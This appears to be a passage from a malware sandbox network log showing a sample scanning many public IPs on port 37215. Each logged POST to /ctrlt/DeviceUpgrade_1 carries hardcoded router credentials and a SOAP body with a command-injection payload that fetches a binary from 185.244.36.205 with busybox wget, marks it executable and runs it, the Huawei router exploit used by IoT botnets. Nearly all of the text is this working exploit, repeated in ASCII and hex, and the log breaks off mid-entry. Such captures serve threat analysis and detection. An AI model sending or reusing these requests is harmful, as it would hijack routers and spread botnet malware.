                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2287192.168.2.1549384197.7.162.24637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466278076 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2288192.168.2.1547776122.16.83.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466293097 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2289192.168.2.155152841.22.2.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466656923 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2290192.168.2.1550280156.254.135.22937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466674089 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2291192.168.2.1559050181.48.26.18437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466687918 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2292192.168.2.153744031.184.119.1737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466794014 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2293192.168.2.153405641.100.240.3337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466813087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2294192.168.2.1558620122.19.183.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466840982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2295192.168.2.1535506222.25.158.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466855049 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2296192.168.2.1549884138.59.174.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466872931 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2297192.168.2.1536696157.23.130.14137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.466888905 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
